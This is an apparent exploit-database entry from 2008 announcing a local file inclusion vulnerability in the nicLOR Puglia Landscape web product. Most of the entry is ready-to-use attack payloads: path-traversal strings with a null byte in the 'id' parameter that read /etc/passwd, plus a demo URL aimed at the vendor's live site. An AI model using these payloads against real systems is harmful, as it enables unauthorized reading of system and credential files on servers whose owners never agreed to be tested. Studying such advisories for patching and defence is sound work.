id: 4056
date: 11/04/2008
title: nicLOR Puglia Landscape (id) Local File Inclusion Vulnerability
author: StAkeR
cves: 

===============================================================
nicLOR Puglia Landscape (id) Local File Inclusion Vulnerability
===============================================================


/*
   ---------------------------------------------------
   Puglia_Landscape Local File Inclusion Vulnerability
   ---------------------------------------------------
   Discovered By StAkeR
   http://www.niclor.net/prodotti/Puglia_Landscape
   ---------------------------------------------------
   
   * Local File Inclusion
   * Note: Magic_Quotes_GPC Off
   
   - index.php?id=../../../../../../../[Local File and NullByte]
   - index.php?id=../../../../../../../etc/passwd%00
   
   * Demo
   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
 
   

*/



#  0day.today [2023-03-25]  #